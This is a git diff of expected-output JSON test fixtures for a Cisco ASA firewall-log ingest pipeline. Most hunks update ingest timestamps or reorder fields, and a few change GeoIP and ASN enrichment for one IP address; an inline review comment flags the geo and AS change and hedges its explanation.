\"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -20664,7 +20664,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:41.996312Z", + "ingested": "2021-12-14T14:38:25.939030846Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -20745,7 +20745,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:41.996318300Z", + "ingested": "2021-12-14T14:38:25.939031306Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", 
@@ -20826,7 +20826,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:41.996324500Z", + "ingested": "2021-12-14T14:38:25.939031767Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -20907,7 +20907,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:41.996330700Z", + "ingested": "2021-12-14T14:38:25.939032234Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", diff --git a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-dap-records.log-expected.json b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-dap-records.log-expected.json index c9de8beac99..3496a4bf5aa 100644 --- a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-dap-records.log-expected.json +++ b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-dap-records.log-expected.json @@ -1,34 +1,6 @@ { "expected": [ { - "log": { - "level": "informational" - }, - "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", - "country_iso_code": "GB", - "country_name": "United Kingdom", - "region_name": "Oxfordshire", - "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" - } - }, - "address": "81.2.69.144", - "ip": "81.2.69.144" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "type": "firewall", "product": "asa", 
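Review bot: The regenerated expectation for test-dap-records drops the `source.as` object (number 20712, organization "Andrews \u0026 Arnold Ltd") for 81.2.69.144 and moves the city from Abingdon/GB-OXF to London/GB-ENG, and the test-not-ip section later in this diff loses the same `destination.as` block; the commit only bumps elastic-package, so this reads as a change in the GeoIP/ASN test database shipped by the newer stack rather than a pipeline change, but that inference is not confirmed anywhere in the diff. Because `source.as`/`destination.as` are enrichment fields detections and dashboards may key on, it is worth confirming the pipeline's ASN geoip processor still populates them against a real database and that the fixture loss is purely a test-database artifact. A one-line mention in the commit description of why the geo and AS expectations moved would save the next person from reading this as a regression.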
@@ -43,9 +15,28 @@ "81.2.69.144" ] }, + "log": { + "level": "informational" + }, + "source": { + "geo": { + "continent_name": "Europe", + "region_iso_code": "GB-ENG", + "city_name": "London", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "England", + "location": { + "lon": -0.0931, + "lat": 51.5142 + } + }, + "address": "81.2.69.144", + "ip": "81.2.69.144" + }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:15.339875200Z", + "ingested": "2021-12-14T14:39:01.110774009Z", "original": "Feb 20 2020 16:11:11: %ASA-6-734001: DAP: User firsname.lastname@domain.net, Addr 81.2.69.144, Connection AnyConnect: The following DAP records were selected for this connection: dap_1, dap_2", "code": "734001", "kind": "event", @@ -68,7 +59,10 @@ "dap_2" ] } - } + }, + "tags": [ + "preserve_original_event" + ] } ] } \ No newline at end of file diff --git a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-filtered.log-expected.json b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-filtered.log-expected.json index cab2b86a191..9be3b6ff122 100644 --- a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-filtered.log-expected.json +++ b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-filtered.log-expected.json @@ -1,22 +1,16 @@ { "expected": [ { - "process": { - "name": "asa", - "pid": 1234 - }, - "log": { - "level": "debug" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "hostname": "beats", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "asa", + "pid": 1234 + }, "@timestamp": "2021-01-01T01:00:27.000Z", "ecs": { "version": "1.12.0" 
@@ -26,12 +20,15 @@ "beats" ] }, + "log": { + "level": "debug" + }, "host": { "hostname": "beats" }, "event": { "severity": 7, - "ingested": "2021-12-09T13:34:15.509140500Z", + "ingested": "2021-12-14T14:39:01.276128469Z", "original": "Jan 1 01:00:27 beats asa[1234]: %ASA-7-999999: This message is not filtered.", "code": "999999", "kind": "event", @@ -45,7 +42,10 @@ }, "cisco": { "asa": {} - } + }, + "tags": [ + "preserve_original_event" + ] }, { "observer": { @@ -72,7 +72,7 @@ }, "event": { "severity": 8, - "ingested": "2021-12-09T13:34:15.509148700Z", + "ingested": "2021-12-14T14:39:01.276131408Z", "original": "Jan 1 01:00:30 beats asa[1234]: %ASA-8-999999: This phony message is dropped due to log level.", "code": "999999", "kind": "event", @@ -146,7 +146,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:34:15.509154300Z", + "ingested": "2021-12-14T14:39:01.276131827Z", "original": "Jan 1 01:02:12 beats asa[1234]: %ASA-2-106001: Inbound TCP connection denied from 10.13.12.11/45321 to 192.168.33.12/443 flags URG+SYN+RST on interface eth0", "code": "106001", "kind": "event", diff --git a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-hostnames.log-expected.json b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-hostnames.log-expected.json index c0aa0eab790..0c3fa2cca20 100644 --- a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-hostnames.log-expected.json +++ b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-hostnames.log-expected.json @@ -45,7 +45,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:15.786608700Z", + "ingested": "2021-12-14T14:39:01.600472142Z", "original": "Oct 10 2019 10:21:36 localhost: %ASA-6-302021: Teardown ICMP connection for faddr target.destination.hostname.local/10005 gaddr 10.0.55.66/0 laddr Prod-host.name.addr/0", "code": "302021", "kind": "event", 
@@ -107,7 +107,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:15.786616300Z", + "ingested": "2021-12-14T14:39:01.600475201Z", "original": "Jun 04 2011 21:59:52 MYHOSTNAME : %ASA-6-302021: Teardown ICMP connection for faddr 192.168.2.15/0 gaddr 192.168.2.134/57808 laddr 192.168.2.134/57808 type 8 code 0", "code": "302021", "kind": "event", diff --git a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-not-ip.log-expected.json b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-not-ip.log-expected.json index 898640c4657..4b3295c6eb6 100644 --- a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-not-ip.log-expected.json +++ b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-not-ip.log-expected.json @@ -7,20 +7,14 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", @@ -73,7 +67,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:34:15.994818500Z", + "ingested": "2021-12-14T14:39:01.861495681Z", "original": "\u003c165\u003eOct 04 2019 15:27:55: %ASA-5-106100: access-list AL-DMZ-LB-IN denied tcp LB-DMZ/WHAT-IS-THIS-A-HOSTNAME-192.168.2.244(27218) -\u003e OUTSIDE/81.2.69.144(53) hit-cnt 1 first hit [0x16847359, 0x00000000]", "code": "106100", "kind": "event", 
@@ -138,7 +132,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:15.994826400Z", + "ingested": "2021-12-14T14:39:01.861497888Z", "original": "Jan 1 2020 10:42:53 localhost : %ASA-6-302021: Teardown ICMP connection for faddr 172.24.177.29/0 gaddr mydomain.example.net/17233 laddr 192.168.132.46/17233", "code": "302021", "kind": "event", @@ -220,7 +214,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:34:15.994831900Z", + "ingested": "2021-12-14T14:39:01.861498319Z", "original": "Jan 2 2020 11:33:20 localhost : %ASA-4-338204: Dynamic filter dropped greylisted TCP traffic from eth0:10.10.10.1/1234 (source.example.net/11234) to wan:172.24.177.3/80 (www.example.org/80), destination malicious address resolved from dynamic list: example.org, threat-level: high, category: malware", "code": "338204", "kind": "event", diff --git a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-sample.log-expected.json b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-sample.log-expected.json index 876d13e8e31..de916eee21e 100644 --- a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-sample.log-expected.json +++ b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-sample.log-expected.json @@ -48,7 +48,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:34:16.394993200Z", + "ingested": "2021-12-14T14:39:02.289529776Z", "original": "Apr 15 2013 09:36:50: %ASA-4-106023: Deny tcp src dmz:10.1.2.30/63016 dst outside:192.168.0.8/53 by access-group \"acl_dmz\" [0xe3aab522, 0x0]", "code": "106023", "kind": "event", @@ -118,7 +118,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:34:16.395002200Z", + "ingested": "2021-12-14T14:39:02.289532045Z", "original": "Apr 15 2013 09:36:50: %ASA-4-106023: Deny tcp src dmz:10.1.2.30/63016 dst outside:192.168.0.8/53 type 3, code 0, by access-group \"acl_dmz\" [0xe3aab522, 0x0]", "code": "106023", "kind": "event", 
@@ -188,7 +188,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:34:16.395008300Z", + "ingested": "2021-12-14T14:39:02.289532517Z", "original": "Apr 15 2014 09:34:34 EDT: %ASA-session-5-106100: access-list acl_in permitted tcp inside/10.1.2.16(2241) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -266,7 +266,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:16.395031600Z", + "ingested": "2021-12-14T14:39:02.289532906Z", "original": "Apr 24 2013 16:00:28 INT-FW01 : %ASA-6-106100: access-list inside denied udp inside/172.29.2.101(1039) -\u003e outside/192.168.2.10(53) hit-cnt 1 first hit [0xd820e56a, 0x0]", "code": "106100", "kind": "event", @@ -343,7 +343,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:16.395053100Z", + "ingested": "2021-12-14T14:39:02.289533321Z", "original": "Apr 24 2013 16:00:27 INT-FW01 : %ASA-6-106100: access-list inside permitted udp inside/172.29.2.3(1065) -\u003e outside/192.168.2.57(53) hit-cnt 144 300-second interval [0xe982c7a4, 0x0]", "code": "106100", "kind": "event", @@ -413,7 +413,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:16.395058800Z", + "ingested": "2021-12-14T14:39:02.289533702Z", "original": "Apr 29 2013 12:59:50: %ASA-6-305011: Built dynamic TCP translation from outside:10.123.3.42/4952 to outside:192.168.2.130/12834", "code": "305011", "kind": "event", @@ -484,7 +484,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:16.395064300Z", + "ingested": "2021-12-14T14:39:02.289534102Z", "original": "Apr 29 2013 12:59:50: %ASA-6-302013: Built outbound TCP connection 89743274 for outside:192.168.2.43/443 (192.168.2.43/443) to outside:10.123.3.42/4952 (10.123.3.42/12834)", "code": "302013", "kind": "event", 
@@ -556,7 +556,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:16.395069800Z", + "ingested": "2021-12-14T14:39:02.289534481Z", "original": "Apr 29 2013 12:59:50: %ASA-6-305011: Built dynamic UDP translation from outside:10.123.1.35/52925 to outside:192.168.2.130/25882", "code": "305011", "kind": "event", @@ -631,7 +631,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:16.395075200Z", + "ingested": "2021-12-14T14:39:02.289534865Z", "original": "Apr 29 2013 12:59:50: %ASA-6-302015: Built outbound UDP connection 89743275 for outside:192.168.2.222/53 (192.168.2.43/53) to outside:10.123.1.35/52925 (10.123.1.35/25882)", "code": "302015", "kind": "event", @@ -703,7 +703,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:16.395080600Z", + "ingested": "2021-12-14T14:39:02.289535253Z", "original": "Apr 29 2013 12:59:50: %ASA-6-305011: Built dynamic TCP translation from outside:10.123.3.42/4953 to outside:192.168.2.130/45392", "code": "305011", "kind": "event", @@ -776,7 +776,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:16.395086100Z", + "ingested": "2021-12-14T14:39:02.289535645Z", "original": "Apr 29 2013 12:59:50: %ASA-6-302013: Built outbound TCP connection 89743276 for outside:192.168.2.1/80 (192.168.2.1/80) to outside:10.123.3.42/4953 (10.123.3.130/45392)", "code": "302013", "kind": "event", @@ -850,7 +850,7 @@ "event": { "severity": 6, "duration": 5025000000000, - "ingested": "2021-12-09T13:34:16.395092Z", + "ingested": "2021-12-14T14:39:02.289536275Z", "original": "Apr 29 2013 12:59:50: %ASA-6-302016: Teardown UDP connection 89743275 for outside:192.168.2.222/53 to inside:10.123.1.35/52925 duration 1:23:45 bytes 140", "code": "302016", "kind": "event", 
@@ -923,7 +923,7 @@ "event": { "severity": 6, "duration": 36000000000000, - "ingested": "2021-12-09T13:34:16.395097700Z", + "ingested": "2021-12-14T14:39:02.289536687Z", "original": "Apr 29 2013 12:59:50: %ASA-6-302016: Teardown UDP connection 666 for outside:192.168.2.222/53 user1 to inside:10.123.1.35/52925 user2 duration 10:00:00 bytes 9999999", "code": "302016", "kind": "event", @@ -991,7 +991,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:16.395103300Z", + "ingested": "2021-12-14T14:39:02.289537067Z", "original": "Jun 04 2011 21:59:52 FJSG2NRFW01 : %ASA-6-302021: Teardown ICMP connection for faddr 172.24.177.29/0 gaddr 192.168.132.46/17233 laddr 192.168.132.46/17233", "code": "302021", "kind": "event", @@ -1058,7 +1058,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:16.395108700Z", + "ingested": "2021-12-14T14:39:02.289537458Z", "original": "Apr 29 2013 12:59:50: %ASA-6-305011: Built dynamic TCP translation from inside:192.168.3.42/4954 to outside:192.168.0.130/10879", "code": "305011", "kind": "event", @@ -1131,7 +1131,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:16.395114200Z", + "ingested": "2021-12-14T14:39:02.289537847Z", "original": "Apr 29 2013 12:59:50: %ASA-6-302013: Built outbound TCP connection 89743277 for outside:192.168.0.17/80 (192.168.0.17/80) to inside:192.168.3.42/4954 (10.0.0.130/10879)", "code": "302013", "kind": "event", @@ -1195,7 +1195,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:34:16.395119800Z", + "ingested": "2021-12-14T14:39:02.289538392Z", "original": "Apr 30 2013 09:22:33: %ASA-2-106007: Deny inbound UDP from 192.168.0.66/12981 to 10.1.2.60/53 due to DNS Query", "code": "106007", "kind": "event", 
@@ -1261,7 +1261,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:34:16.395125300Z", + "ingested": "2021-12-14T14:39:02.289538792Z", "original": "Apr 30 2013 09:22:38: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2006) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -1331,7 +1331,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:34:16.395130800Z", + "ingested": "2021-12-14T14:39:02.289539176Z", "original": "Apr 30 2013 09:22:38: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49734) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -1401,7 +1401,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:34:16.395136200Z", + "ingested": "2021-12-14T14:39:02.289539564Z", "original": "Apr 30 2013 09:22:39: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49735) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -1471,7 +1471,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:34:16.395141700Z", + "ingested": "2021-12-14T14:39:02.289539951Z", "original": "Apr 30 2013 09:22:39: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49736) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -1541,7 +1541,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:34:16.395147Z", + "ingested": "2021-12-14T14:39:02.289540342Z", "original": "Apr 30 2013 09:22:39: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49737) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", 
@@ -1611,7 +1611,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:34:16.395152900Z", + "ingested": "2021-12-14T14:39:02.289540737Z", "original": "Apr 30 2013 09:22:40: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49738) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -1681,7 +1681,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:34:16.395158500Z", + "ingested": "2021-12-14T14:39:02.289541233Z", "original": "Apr 30 2013 09:22:41: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49746) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -1751,7 +1751,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:34:16.395165900Z", + "ingested": "2021-12-14T14:39:02.289541624Z", "original": "Apr 30 2013 09:22:47: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2007) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -1821,7 +1821,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:34:16.395171200Z", + "ingested": "2021-12-14T14:39:02.289542029Z", "original": "Apr 30 2013 09:22:48: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.13(43013) -\u003e dmz/192.168.33.31(25) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -1891,7 +1891,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:34:16.395176100Z", + "ingested": "2021-12-14T14:39:02.289542413Z", "original": "Apr 30 2013 09:22:56: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2008) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", 
@@ -1957,7 +1957,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:34:16.395181700Z", + "ingested": "2021-12-14T14:39:02.289542801Z", "original": "Apr 30 2013 09:23:02: %ASA-2-106006: Deny inbound UDP from 192.168.2.66/137 to 10.1.2.42/137 on interface inside", "code": "106006", "kind": "event", @@ -2017,7 +2017,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:34:16.395187200Z", + "ingested": "2021-12-14T14:39:02.289543193Z", "original": "Apr 30 2013 09:23:03: %ASA-2-106007: Deny inbound UDP from 192.168.2.66/12981 to 10.1.5.60/53 due to DNS Query", "code": "106007", "kind": "event", @@ -2083,7 +2083,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:34:16.395192700Z", + "ingested": "2021-12-14T14:39:02.289543594Z", "original": "Apr 30 2013 09:23:06: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2009) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -2153,7 +2153,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:34:16.395198100Z", + "ingested": "2021-12-14T14:39:02.289543992Z", "original": "Apr 30 2013 09:23:08: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49776) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -2223,7 +2223,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:34:16.395203500Z", + "ingested": "2021-12-14T14:39:02.289544385Z", "original": "Apr 30 2013 09:23:15: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2010) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", 
@@ -2293,7 +2293,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:34:16.395208900Z", + "ingested": "2021-12-14T14:39:02.289544774Z", "original": "Apr 30 2013 09:23:24: %ASA-5-106100: access-list acl_in denied tcp inside/10.0.0.16(2011) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -2363,7 +2363,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:34:16.395214400Z", + "ingested": "2021-12-14T14:39:02.289545155Z", "original": "Apr 30 2013 09:23:34: %ASA-5-106100: access-list acl_in denied tcp inside/10.0.0.16(2012) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -2433,7 +2433,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:34:16.395220Z", + "ingested": "2021-12-14T14:39:02.289545680Z", "original": "Apr 30 2013 09:23:40: %ASA-4-106023: Deny tcp src outside:192.168.2.126/53638 dst inside:10.0.0.132/8111 by access-group \"acl_out\" [0x71761f18, 0x0]", "code": "106023", "kind": "event", @@ -2503,7 +2503,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:34:16.395225400Z", + "ingested": "2021-12-14T14:39:02.289546068Z", "original": "Apr 30 2013 09:23:41: %ASA-4-106023: Deny tcp src outside:192.168.2.126/53638 dst inside:10.0.0.132/8111 by access-group \"acl_out\" [0x71761f18, 0x0]", "code": "106023", "kind": "event", @@ -2573,7 +2573,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:34:16.395230900Z", + "ingested": "2021-12-14T14:39:02.289546466Z", "original": "Apr 30 2013 09:23:43: %ASA-5-106100: access-list acl_in est-allowed tcp inside/10.0.0.46(49840) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", 
@@ -2643,7 +2643,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:34:16.395236300Z", + "ingested": "2021-12-14T14:39:02.289546861Z", "original": "Apr 30 2013 09:23:43: %ASA-5-106100: access-list acl_in est-allowed tcp inside/10.0.0.16(2013) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -2713,7 +2713,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:34:16.395241700Z", + "ingested": "2021-12-14T14:39:02.289547255Z", "original": "Apr 15 2018 09:34:34 EDT: %ASA-session-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2241) -\u003e outside/192.168.0.99(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -2788,7 +2788,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:16.395247200Z", + "ingested": "2021-12-14T14:39:02.289547638Z", "original": "Dec 11 2018 08:01:24 \u003cIP\u003e: %ASA-6-302015: Built outbound UDP connection 447235 for outside:192.168.77.12/11180 (192.168.77.12/11180) to identity:10.0.13.13/80 (10.0.13.13/80)", "code": "302015", "kind": "event", @@ -2863,7 +2863,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:34:16.395252700Z", + "ingested": "2021-12-14T14:39:02.289548028Z", "original": "Dec 11 2018 08:01:24 \u003cIP\u003e: %ASA-4-106023: Deny udp src dmz:192.168.1.33/5555 dst outside:192.168.0.12/53 by access-group \"dmz\" [0x123a465e, 0x4c7bf613]", "code": "106023", "kind": "event", @@ -2936,7 +2936,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:34:16.395258200Z", + "ingested": "2021-12-14T14:39:02.289548413Z", "original": "Dec 11 2018 08:01:24 \u003cIP\u003e: %ASA-4-106023: Deny udp src dmz:192.168.1.33/5555 dst outside:192.168.0.12/53 by access-group \"dmz\" [0x123a465e, 0x4c7bf613]", "code": "106023", "kind": "event", 
@@ -3012,7 +3012,7 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-09T13:34:16.395263600Z",
+ "ingested": "2021-12-14T14:39:02.289548801Z",
 "original": "Dec 11 2018 08:01:31 \u003cIP\u003e: %ASA-6-302013: Built outbound TCP connection 447236 for outside:192.168.2.222/1234 (192.168.2.222/1234) to dmz:OCSP_Server/5678 (OCSP_Server/5678)",
 "code": "302013",
 "kind": "event",
@@ -3090,7 +3090,7 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-09T13:34:16.395269100Z",
+ "ingested": "2021-12-14T14:39:02.289549197Z",
 "original": "Dec 11 2018 08:01:31 \u003cIP\u003e: %ASA-6-302013: Built outbound TCP connection 447236 for outside:192.168.2.222/1234 (192.168.2.222/1234) to dmz:OCSP_Server/5678 (OCSP_Server/5678)",
 "code": "302013",
 "kind": "event",
@@ -3168,7 +3168,7 @@
 "severity": 6,
 "duration": 0,
 "reason": "TCP FINs",
- "ingested": "2021-12-09T13:34:16.395274600Z",
+ "ingested": "2021-12-14T14:39:02.289549588Z",
 "original": "Dec 11 2018 08:01:31 \u003cIP\u003e: %ASA-6-302014: Teardown TCP connection 447236 for outside:192.168.2.222/1234 to dmz:192.168.1.34/5678 duration 0:00:00 bytes 14804 TCP FINs",
 "code": "302014",
 "kind": "event",
@@ -3245,7 +3245,7 @@
 "severity": 6,
 "duration": 68000000000,
 "reason": "TCP FINs",
- "ingested": "2021-12-09T13:34:16.395280100Z",
+ "ingested": "2021-12-14T14:39:02.289549977Z",
 "original": "Dec 11 2018 08:01:38 \u003cIP\u003e: %ASA-6-302014: Teardown TCP connection 447234 for outside:192.168.2.222/1234 to dmz:192.168.1.35/5678 duration 0:01:08 bytes 134781 TCP FINs",
 "code": "302014",
 "kind": "event",
@@ -3322,7 +3322,7 @@
 "severity": 6,
 "duration": 68000000000,
 "reason": "TCP FINs",
- "ingested": "2021-12-09T13:34:16.395285500Z",
+ "ingested": "2021-12-14T14:39:02.289550387Z",
 "original": "Dec 11 2018 08:01:38 \u003cIP\u003e: %ASA-6-302014: Teardown TCP connection 447234 for outside:192.168.2.222/1234 to dmz:192.168.1.35/5678 duration 0:01:08 bytes 134781 TCP FINs",
 "code": "302014",
 "kind": "event",
@@ -3391,7 +3391,7 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-09T13:34:16.395291100Z",
+ "ingested": "2021-12-14T14:39:02.289550779Z",
 "original": "Dec 11 2018 08:01:38 \u003cIP\u003e: %ASA-6-106015: Deny TCP (no connection) from 192.168.2.222/1234 to 192.168.1.34/5679 flags RST on interface outside",
 "code": "106015",
 "kind": "event",
@@ -3457,7 +3457,7 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-09T13:34:16.395296500Z",
+ "ingested": "2021-12-14T14:39:02.289551169Z",
 "original": "Dec 11 2018 08:01:38 \u003cIP\u003e: %ASA-6-106015: Deny TCP (no connection) from 192.168.2.222/1234 to 192.168.1.34/5679 flags RST on interface outside",
 "code": "106015",
 "kind": "event",
@@ -3528,7 +3528,7 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-12-09T13:34:16.395318800Z",
+ "ingested": "2021-12-14T14:39:02.289551558Z",
 "original": "Dec 11 2018 08:01:39 \u003cIP\u003e: %ASA-4-106023: Deny udp src dmz:192.168.1.34/5679 dst outside:192.168.0.12/5000 by access-group \"dmz\" [0x123a465e, 0x8c20f21]",
 "code": "106023",
 "kind": "event",
@@ -3602,7 +3602,7 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-09T13:34:16.395324800Z",
+ "ingested": "2021-12-14T14:39:02.289552047Z",
 "original": "Dec 11 2018 08:01:53 \u003cIP\u003e: %ASA-6-302013: Built outbound TCP connection 447237 for outside:192.168.2.222/1234 (192.168.2.222/1234) to dmz:192.168.1.34/65000 (192.168.1.34/65000)",
 "code": "302013",
 "kind": "event",
@@ -3678,7 +3678,7 @@
